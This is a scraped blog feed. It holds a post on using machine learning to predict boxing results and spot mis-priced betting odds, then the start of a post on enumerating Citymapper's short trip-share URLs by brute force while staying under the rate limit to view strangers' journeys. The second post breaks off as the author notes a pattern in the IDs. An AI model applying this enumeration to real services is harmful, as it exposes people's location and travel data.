    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/422a5853b0ce018adab8a13a8a44fc3b/47311/twitter.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 135.13513513513513%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAMCAQX/xAAUAQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIQAxAAAAH1a7HQSrPRoH//xAAYEAADAQEAAAAAAAAAAAAAAAAAAQIQEf/aAAgBAQABBQKXLOrGcEK5vaOZ/8QAFBEBAAAAAAAAAAAAAAAAAAAAIP/aAAgBAwEBPwEf/8QAFBEBAAAAAAAAAAAAAAAAAAAAIP/aAAgBAgEBPwEf/8QAGRAAAgMBAAAAAAAAAAAAAAAAASECESBh/9oACAEBAAY/AjUSHpWua//EAB0QAAIDAAIDAAAAAAAAAAAAAAABESFBEDFxgZH/2gAIAQEAAT8h3kJyzyC6rj6/DoTmiLgJkCJYJYVCUI//2gAMAwEAAgADAAAAEMAPPP/EABQRAQAAAAAAAAAAAAAAAAAAACD/2gAIAQMBAT8QH//EABQRAQAAAAAAAAAAAAAAAAAAACD/2gAIAQIBAT8QH//EAB4QAQEBAAEEAwAAAAAAAAAAAAERACExQVFhcZGh/9oACAEBAAE/EDnICzkHr7wMYe3XchyTy4dHi+y75fRqIv5mT3BTl6pzgQjcQZggKNhrbw84oBDf/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Tweet&quot;
        title=&quot;Tweet&quot;
        src=&quot;/static/422a5853b0ce018adab8a13a8a44fc3b/1c72d/twitter.jpg&quot;
        srcset=&quot;/static/422a5853b0ce018adab8a13a8a44fc3b/a80bd/twitter.jpg 148w,
/static/422a5853b0ce018adab8a13a8a44fc3b/1c91a/twitter.jpg 295w,
/static/422a5853b0ce018adab8a13a8a44fc3b/1c72d/twitter.jpg 590w,
/static/422a5853b0ce018adab8a13a8a44fc3b/a8a14/twitter.jpg 885w,
/static/422a5853b0ce018adab8a13a8a44fc3b/47311/twitter.jpg 1080w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;While next manager markets are a difficult problem to solve with machine learning, boxing is less so. Boxing only involves 2 people (although coaches, promoters and cornermen are statistically significant), has fixed rules and there is a plethora of data available.&lt;/p&gt;
&lt;p&gt;The dataset I was working with contained over 2 million fights. There were boxers in every weight class hailing from every corner of the world. Before I performed any feature engineering there were  28 variables to work with including; date of birth, date of debut, venue, stance and world ranking. However, some data was missing.&lt;/p&gt;
&lt;h2&gt;The Data&lt;/h2&gt;
&lt;p&gt;The dataset contained over 2 million fights and there were boxers in every weight class hailing from every corner of the world. Prior to conducting any feature engineering there were 28 variables to work with including; date of birth, date of debut, venue, stance and world ranking. However, some data was missing.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;df.drop_duplicates(inplace = True)

null_columns=df.columns[df.isnull().any()]
df[null_columns].isnull().sum()&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;kopercentage                 382 
height                     60958 
draws                          4 
opponentwins                 433 
winmethod                   1590 
townofbirth                 2948 
worldrankingbyweight        6414 
reach                     117795 
opponentlosses             15365 
losses                         4 
opponentdraw               15365 
countryrankingbyweight      7301&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Height and reach were the features where there was the greatest absence of data. The difference in your arm span and height are almost identical so it was possible to fill in the data where a boxer had only one of the variables available.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;df[&amp;#39;reach&amp;#39;] = df[&amp;#39;reach&amp;#39;].fillna(df[&amp;#39;height&amp;#39;])
df[&amp;#39;height&amp;#39;] = df[&amp;#39;height&amp;#39;].fillna(df[&amp;#39;reach&amp;#39;])&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Averages were taken across weight classes where other features with missing data was significant&lt;/p&gt;
&lt;p&gt;Once the data had been cleaned, it was also necessary to ‘self-join’ the dataframe. Each record in the dataset represented one half of a fight. There would be a Boxer 1 and a Boxer 2. The target for each row would be Win, Lose, or Draw, with respect to Boxer 1. However, elsewhere in the dataset there would be a record for the same fight but with respect to the opponent. Duplicating the dataset, removing or renaming unnecessary columns and merging the two datasets back together allowed for a richer dataset without any repeated entries.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;df2 = df

df2 = df2.drop([&amp;#39;boxerwin&amp;#39;, &amp;#39;winmethod&amp;#39;, &amp;#39;countryoffight&amp;#39;, &amp;#39;roundspath&amp;#39;, &amp;#39;division&amp;#39;, &amp;#39;sex&amp;#39;, &amp;#39;opponentwins&amp;#39;, &amp;#39;opponentlosses&amp;#39;, &amp;#39;opponentdraw&amp;#39;, &amp;#39;wins&amp;#39;, &amp;#39;losses&amp;#39;, &amp;#39;draws&amp;#39;, &amp;#39;totalboxersindivision&amp;#39;, &amp;#39;roundsinfight&amp;#39;], axis=1) 

df2.columns = (&amp;#39;opponentkopercentage&amp;#39;, &amp;#39;opponentdebut&amp;#39;, &amp;#39;opponentboxrecrating&amp;#39;, &amp;#39;opponentheight&amp;#39;, &amp;#39;opponentrounds&amp;#39;, &amp;#39;opponentform&amp;#39;, &amp;#39;opponenttownofbirth&amp;#39;, &amp;#39;opponentworldrankingbyweight&amp;#39;, &amp;#39;name&amp;#39;, &amp;#39;opponentstance&amp;#39;, &amp;#39;opponentreach&amp;#39;, &amp;#39;opponentbouts&amp;#39;, &amp;#39;opponentcountryofbirth&amp;#39;, &amp;#39;opponent&amp;#39;, &amp;#39;opponentdob&amp;#39;, &amp;#39;venue&amp;#39;, &amp;#39;opponentcountryrankingbyweight&amp;#39;, &amp;#39;opponenttotalboxersindivisionandcountry&amp;#39; ) 

df3 = pd.merge(df, df2, on=[&amp;#39;opponent&amp;#39;, &amp;#39;name&amp;#39;, &amp;#39;venue&amp;#39;])&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Feature Engineering&lt;/h3&gt;
&lt;p&gt;Feature engineering is the process of using domain knowledge of the data to create features that improve machine learning algorithms. In this instance it was creating comparisons between the two fighters which might not be inferred automatically by the machine learning model during training. The new features I created included; difference in height, difference in reach and difference in their win records. Intunitively we know that a ‘home advantage’ is important in sports, so I added a binary feature which indicated whether the venue matched either of the boxers’ countries of birth.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;#height diference
df3[&amp;#39;Diff_height&amp;#39;] = df3.height - df3.opponentheight

#reach difference
df3[&amp;#39;Diff_reach&amp;#39;] = df3.reach - df3.opponentreach

#name experience
df3[&amp;#39;name_experience&amp;#39;] = df3.bouts - df3.opponentbouts

#opponent experience
df3[&amp;#39;opponent_experience&amp;#39;] = df3.opponentbouts - df3.bouts

#name_win_pc
df3[&amp;#39;name_win_pc&amp;#39;] = df3.wins / df3.bouts
df3.loc[df3.bouts == 0, &amp;#39;name_win_pc&amp;#39;] = 0
 
#opponent_win_pc
df3[&amp;#39;opponent_win_pc&amp;#39;] = df3.opponentwins / df3.opponentbouts
df3.loc[df3.opponentbouts == 0, &amp;#39;opponent_win_pc&amp;#39;] = 0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The final step before feeding the data into a training model was to one hot encode all of the categorical variables. This is a necessary step as machine learning models need to compute numbers rather than text. The output of one hot encoding is a sparse matrix where each category is binarised – the matrix is populated with zeroes except the index of the matrix, which is marked with a 1.&lt;/p&gt;
&lt;h3&gt;Feature Importance&lt;/h3&gt;
&lt;p&gt;Prior to building a neural network I trained a random forest model to calculate the importance of each feature in my dataset. A feature importance chart provides a score that indicates how valuable a feature was in the construction of the decision trees within the model. The more a feature is used to make key decisions with decision trees, the higher its relative importance.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;#Classifiers
from sklearn.ensemble import RandomForestClassifier

classifiers = [
    RandomForestClassifier(),
    RandomForestClassifier(bootstrap=True, class_weight=None, criterion=&amp;#39;gini&amp;#39;,
            max_depth=17, max_features=6, max_leaf_nodes=None,
            min_impurity_decrease=0.0, min_impurity_split=None,
            min_samples_leaf=1, min_samples_split=2,
            min_weight_fraction_leaf=0.0, n_estimators=70, n_jobs=1,
            oob_score=False, random_state=None, verbose=0,
            warm_start=True)

for item in classifiers:
    classifier_name = ((str(item)[:(str(item).find(&amp;quot;(&amp;quot;))]))
    print (classifier_name)
    
     Create classifier, train it and test it.
    clf = item
    clf.fit(feature_train, label_train)
    score = clf.score(feature_test, label_test)
    print (round(score,3),&amp;quot;\n&amp;quot;, &amp;quot;- - - - - &amp;quot;, &amp;quot;\n&amp;quot;)
    
importance_df = pd.DataFrame()
importance_df[&amp;#39;feature&amp;#39;] = X2.columns
importance_df[&amp;#39;importance&amp;#39;] = clf.feature_importances_    

importance_df.sort_values(&amp;#39;importance&amp;#39;, ascending=False)
importance_df.set_index(keys=&amp;#39;feature&amp;#39;).sort_values(by=&amp;#39;importance&amp;#39;, ascending=True).plot(kind=&amp;#39;barh&amp;#39;, figsize=(200, 150))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Zoomed out you can see all the features and their importance relative to each-other. The top features ended up being;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Difference in World Ranking&lt;/li&gt;
&lt;li&gt;Difference in Win %&lt;/li&gt;
&lt;li&gt;KO %&lt;/li&gt;
&lt;li&gt;The total number of rounds a boxer has fought in&lt;/li&gt;
&lt;li&gt;Age difference&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/105c1de80be5e11b1e0a6d6b7cce8af5/72e01/importance.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 73.64864864864865%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAPABQDASIAAhEBAxEB/8QAGAAAAgMAAAAAAAAAAAAAAAAAAAQBAgX/xAAUAQEAAAAAAAAAAAAAAAAAAAAC/9oADAMBAAIQAxAAAAFx5TQYgsB//8QAGhAAAgIDAAAAAAAAAAAAAAAAAQIAAxARIf/aAAgBAQABBQKIgA1K+vj/xAAVEQEBAAAAAAAAAAAAAAAAAAACEP/aAAgBAwEBPwEz/8QAFREBAQAAAAAAAAAAAAAAAAAAAhD/2gAIAQIBAT8BU//EABUQAQEAAAAAAAAAAAAAAAAAABAB/9oACAEBAAY/AmP/xAAcEAACAQUBAAAAAAAAAAAAAAAAEQEQIVFh8PH/2gAIAQEAAT8hXMuqHOxMQeBX/9oADAMBAAIAAwAAABCzD//EABYRAAMAAAAAAAAAAAAAAAAAAAEQQf/aAAgBAwEBPxAKv//EABYRAAMAAAAAAAAAAAAAAAAAAAEQQf/aAAgBAgEBPxAov//EABwQAQACAgMBAAAAAAAAAAAAAAEAESExEHGB0f/aAAgBAQABPxASgCroIA1Ll2rqU/KAGJhvxz//2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Chart&quot;
        title=&quot;Chart&quot;
        src=&quot;/static/105c1de80be5e11b1e0a6d6b7cce8af5/1c72d/importance.jpg&quot;
        srcset=&quot;/static/105c1de80be5e11b1e0a6d6b7cce8af5/a80bd/importance.jpg 148w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/1c91a/importance.jpg 295w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/1c72d/importance.jpg 590w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/a8a14/importance.jpg 885w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/72e01/importance.jpg 1024w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;On choosing which factors to include in a deep learning model I was hoping to find an strong inflection point which unfortunately wasn’t available. However, you can infer relative importance by comparing all the features to variables you know shouldn’t be statistically important. As draws are relatively rare in boxing and therefore shouldn’t be a high value feature in a decision tree, we can use the ‘draw’ feature as a yardstick and pick features to use in a deep learning model accordingly.&lt;/p&gt;
&lt;h2&gt;Neural Network&lt;/h2&gt;
&lt;p&gt;Using a relatively simple network architecture I was able to achieve an accuracy of 92% across the validation data using an 80:20 split. Further experimentation would include more complex architectures, dropout and batch normalisation but I was keen to use my model on future bouts.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;classifier = Sequential() 

classifier.add(Dense(output_dim = 6, init = &amp;#39;uniform&amp;#39;, activation = &amp;#39;relu&amp;#39;, input_dim = 40)) 

classifier.add(Dense(output_dim = 10, init = &amp;#39;uniform&amp;#39;, activation = &amp;#39;relu&amp;#39;)) 

classifier.add(Dense(output_dim = 10, init = &amp;#39;uniform&amp;#39;, activation = &amp;#39;relu&amp;#39;)) 

classifier.add(Dense(output_dim = 1, init = &amp;#39;uniform&amp;#39;, activation = &amp;#39;sigmoid&amp;#39;))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Epoch 146/150
50886/50886 [==============================] - 31s 610us/step - loss: 0.1903 - acc: 0.9257
Epoch 147/150
50886/50886 [==============================] - 30s 581us/step - loss: 0.1902 - acc: 0.9259
Epoch 148/150
50886/50886 [==============================] - 30s 597us/step - loss: 0.1903 - acc: 0.9257
Epoch 149/150
50886/50886 [==============================] - 30s 580us/step - loss: 0.1901 - acc: 0.9253
Epoch 150/150
50886/50886 [==============================] - 28s 560us/step - loss: 0.1905 - acc: 0.9251&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I trained the neural network twice, once with the intention of picking whether or not a boxer would win and a second time with the intention of trying to pick which round the boxer would win in. The prices offered on picking the correct round are many magnitudes (often as high as 16/1) better than wagering on just a W or L outcome. The accuracy on training a round betting model achieved an accuracy of 17%. While this accuracy is poor, if you can afford to lose 83 times out of 100 but with a 5-16x return on successful bets, this may be a project worthy of further research.&lt;/p&gt;
&lt;h2&gt;Predictions&lt;/h2&gt;
&lt;p&gt;The output of the ‘win’ neural network was a decimal between 0 and 1. A score close to 0 indicated that the boxer in question had a low chance of winning, a score of 1 indicated a high chance of winning.&lt;/p&gt;
&lt;p&gt;While you might consider this prediction enough to start placing your own bets it is first important to compare the confidence of your prediction to the implied probability offered by the bookmaker. Implied probabilities from fractional odds (the most common way of representing odds in the UK) are calculated using the following equation.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;denominator / (denominator + numerator) * 100&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once you have a probability from your model and an implied probability from the bookmaker you can set a decision threshold. Ideally you would refine your decision threshold by gathering large quantities of historical odds, compare them to the predictions of your model and then to the actual outcome.&lt;/p&gt;
&lt;p&gt;In practice, this model favoured betting on clear favourites where the return on investment for an individual bet was less than 10%. Making a consistent 6-7% could have been achieved through automation but this was less interesting than scanning the book for ‘unicorn’ bets. These bets were advantageous to find as the offered odds were significantly mis-priced.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/6f5896f55c1de016d2219ce1e8f4c368/0f98f/pulev.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62.83783783783784%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAIEAwX/xAAXAQADAQAAAAAAAAAAAAAAAAAAAQID/9oADAMBAAIQAxAAAAHnpTgUhQPP/8QAGhABAQACAwAAAAAAAAAAAAAAAQIDEQAEEv/aAAgBAQABBQKQJCeWeKnSYNOXshOX/8QAFhEBAQEAAAAAAAAAAAAAAAAAAhAR/9oACAEDAQE/AUcn/8QAFREBAQAAAAAAAAAAAAAAAAAAARD/2gAIAQIBAT8BJ//EABkQAAMBAQEAAAAAAAAAAAAAAAABESECUf/aAAgBAQAGPwLdMbITpHKhPEf/xAAbEAEAAwADAQAAAAAAAAAAAAABABEhMUFhUf/aAAgBAQABPyHTTHHsS6PEj2G+xIT3DxqX5lfszOwOWf/aAAwDAQACAAMAAAAQUO//xAAXEQEBAQEAAAAAAAAAAAAAAAABABEh/9oACAEDAQE/EEYJOby//8QAFxEAAwEAAAAAAAAAAAAAAAAAAAERIf/aAAgBAgEBPxBrRPNP/8QAGxABAQACAwEAAAAAAAAAAAAAAREAITFBUaH/2gAIAQEAAT8QXpi2xIjUc3oepftyKhQ4BHKkY4SNay/FA7+OLiyApZLNT3P/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pulev&quot;
        title=&quot;Pulev&quot;
        src=&quot;/static/6f5896f55c1de016d2219ce1e8f4c368/1c72d/pulev.jpg&quot;
        srcset=&quot;/static/6f5896f55c1de016d2219ce1e8f4c368/a80bd/pulev.jpg 148w,
/static/6f5896f55c1de016d2219ce1e8f4c368/1c91a/pulev.jpg 295w,
/static/6f5896f55c1de016d2219ce1e8f4c368/1c72d/pulev.jpg 590w,
/static/6f5896f55c1de016d2219ce1e8f4c368/a8a14/pulev.jpg 885w,
/static/6f5896f55c1de016d2219ce1e8f4c368/fbd2c/pulev.jpg 1180w,
/static/6f5896f55c1de016d2219ce1e8f4c368/0f98f/pulev.jpg 1920w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This happened in the bout between Hughie Fury and Kubrat Pulev in October 2018. Kubrat Pulev was a higher ranked boxer fighting on home turf in Sofia, Bulgaria. However, in British betting markets there was significant market sentiment in favour of Hughie Fury.&lt;/p&gt;
&lt;p&gt;The machine learning model believed the probability of Kubrat Pulev winning the fight was 93%. The implied probability offered by the bookmakers was that he was only a marginal favourite at around 66% meaning I could place a high confidence bet at odds of 4/8.&lt;/p&gt;
&lt;p&gt;The takeaway points for this project is that it is possible to engineer a small advantage over the bookmakers using machine learning. As the barriers to entry for learning about Artificial Intelligence are lowered, this is something that is available to more people every day.&lt;/p&gt;
&lt;p&gt;With extra time and automation it may be possible to a get a moderate return on investment at a risk you can control by adjusting your thresholds for bet placement.&lt;/p&gt;
&lt;p&gt;For those of you who are more casual betters, machine learning can be used to try and identify mis-priced bets. While I haven’t done any further research, I think mis-pricing and international betting markets would be an interesting area of research.&lt;/p&gt;
&lt;p&gt;I will leave you with the odds offered on each round for Anthony Joshua to beat Joseph Parker in the UK…&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Joshua to win in round 1    14/1
Joshua to win in round 2    10/1
Joshua to win in round 3    8/1
Joshua to win in round 4    8/1
Joshua to win in round 5    8/1
Joshua to win in round 6    8/1
Joshua to win in round 7    8/1
Joshua to win in round 8    9/1
Joshua to win in round 9    12/1
Joshua to win in round 10   14/1
Joshua to win in round 11   16/1
Joshua to win in round 12   20/1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;and New Zealand…&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Joshua to win in round 1    17/1
Joshua to win in round 2    15/1
Joshua to win in round 3    12/1
Joshua to win in round 4    12/1
Joshua to win in round 5    10/1
Joshua to win in round 6    10/1
Joshua to win in round 7    10/1
Joshua to win in round 8    12/1
Joshua to win in round 9    15/1
Joshua to win in round 10   17/1
Joshua to win in round 11   19/1
Joshua to win in round 12   21/1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[Online Stalking: London, Paris, New York]]></title><description><![CDATA[Citymapper is a journey planning application that integrates all modes of transport (public, cycling, walking, driving) in major urban areas…]]></description><link>https://dfworks.com/blog/online_stalking_citymapper/</link><guid isPermaLink="false">https://dfworks.com/blog/online_stalking_citymapper/</guid><pubDate>Sun, 18 Feb 2018 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Citymapper is a journey planning application that integrates all modes of transport (public, cycling, walking, driving) in major urban areas. Starting in London, Citymapper is now available in New York, Paris and Amsterdam as well as further afield (as you’ll see shortly).&lt;/p&gt;
&lt;p&gt;Citymapper hasn’t disclosed the number of users it has. The Google Play store states between 5-10million downloads; assume the same, if not higher, for Apple’s App Store. Remember that it is only available in major cities and you can see that a large percentage of the world’s capital cities use this application.&lt;/p&gt;
&lt;p&gt;On a personal note, Citymapper is a ‘must-have’ app for anybody living in London, especially for a non-local. Citymapper’s ability to respond to train non-availability, cancellations and tube strikes whilst still delivering a live and accurate route recommendation has certainly saved a few people caught in the rain or running late for job interviews.&lt;/p&gt;
&lt;h2&gt;So, what kind of data does Citymapper have?&lt;/h2&gt;
&lt;p&gt;On any given day, in cities around the world, they know the exact routes of millions of people; they know where people are travelling, when, and even what modes of transport they are taking.&lt;/p&gt;
&lt;p&gt;This information would be hugely useful and have huge applications for any organisation that operates in one of the world’s major cities… it could also be used maliciously should any of this data be publicly facing.&lt;/p&gt;
&lt;p&gt;In October 2015, Citymapper rolled out an update that allowed it’s users to share routes and arrival times with their friends. Even friends that don’t have the application can view the trip as it all works through the web browser. Each time a trip is planned on Citymapper a URL is generated that allows your friends to view your trip on a web page. Below is an example.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/827e96d36b6d93565a378ffb99db712f/75cae/citymapper.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 72.2972972972973%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAOABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAEFAv/EABUBAQEAAAAAAAAAAAAAAAAAAAID/9oADAMBAAIQAxAAAAGm9omcMjP/xAAZEAACAwEAAAAAAAAAAAAAAAABAwACEjP/2gAIAQEAAQUCTSpXkRoG0843p//EABYRAQEBAAAAAAAAAAAAAAAAAAABMf/aAAgBAwEBPwGLr//EABYRAAMAAAAAAAAAAAAAAAAAAAABMf/aAAgBAgEBPwFQdP/EABkQAAIDAQAAAAAAAAAAAAAAAAABECExkf/aAAgBAQAGPwJUjFwwU//EABsQAQACAgMAAAAAAAAAAAAAAAEAERAhYZHx/9oACAEBAAE/IVBseJ46GZTrHHUdqf/aAAwDAQACAAMAAAAQJM//xAAXEQEBAQEAAAAAAAAAAAAAAAABABEx/9oACAEDAQE/EAYXS//EABcRAAMBAAAAAAAAAAAAAAAAAAABETH/2gAIAQIBAT8QRQbH/8QAHRABAAMAAgMBAAAAAAAAAAAAAQARQWGxITFR4f/aAAgBAQABPxBQ6x8l3mDBtv5QfU0egZDb3j2waltnEuJ8Op//2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Citymapper&quot;
        title=&quot;Citymapper&quot;
        src=&quot;/static/827e96d36b6d93565a378ffb99db712f/1c72d/citymapper.jpg&quot;
        srcset=&quot;/static/827e96d36b6d93565a378ffb99db712f/a80bd/citymapper.jpg 148w,
/static/827e96d36b6d93565a378ffb99db712f/1c91a/citymapper.jpg 295w,
/static/827e96d36b6d93565a378ffb99db712f/1c72d/citymapper.jpg 590w,
/static/827e96d36b6d93565a378ffb99db712f/a8a14/citymapper.jpg 885w,
/static/827e96d36b6d93565a378ffb99db712f/fbd2c/citymapper.jpg 1180w,
/static/827e96d36b6d93565a378ffb99db712f/75cae/citymapper.jpg 2294w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As you can see there isn’t anything hugely compromising and no personal identifiable information is available. You have a start location, an end location, a route and some timing information. In this instance, a random inhabitant of London travelled from Tooting to Balham on the Northern Line before getting an Overground train to Battersea, all in all taking 26 minutes.&lt;/p&gt;
&lt;p&gt;The eagle-eyed amongst you might see where this is going.&lt;/p&gt;
&lt;p&gt;The URL (&lt;a href=&quot;https://citymapper.com/trip/Tbs6odu&quot;&gt;https://citymapper.com/trip/Tbs6odu&lt;/a&gt;) has a fairly short unique identifier. “Tbs6odu”, 7 characters long with uppercase, lowercase and numeric characters.&lt;/p&gt;
&lt;p&gt;By way of comparison, most online sharefile programs that generate random URLs often have upwards of 20 characters; inclusive of uppercase, lowercase, numbers and special characters (Aj5ye&amp;#x26;hsk8Pq@3Hh%#3Q), which is exponentially harder to brute force.&lt;/p&gt;
&lt;p&gt;Using a Python script to generate alphanumerical codes 7 characters in length, and check if they are valid by firing an HTTP request to Citymapper was initially sluggish. Even though it is a comparatively short URL ID there are still ~3 x 1012 combinations to get through – slow progress if you need to remain below the threshold of Citymapper’s rate limiter. In an hour I had discovered less than 10 valid URLs.&lt;/p&gt;
&lt;p&gt;However, there was a pattern!&lt;/p&gt;
&lt;p&gt;-T4v8muk
-Tgg5743
-Tbiwmq9
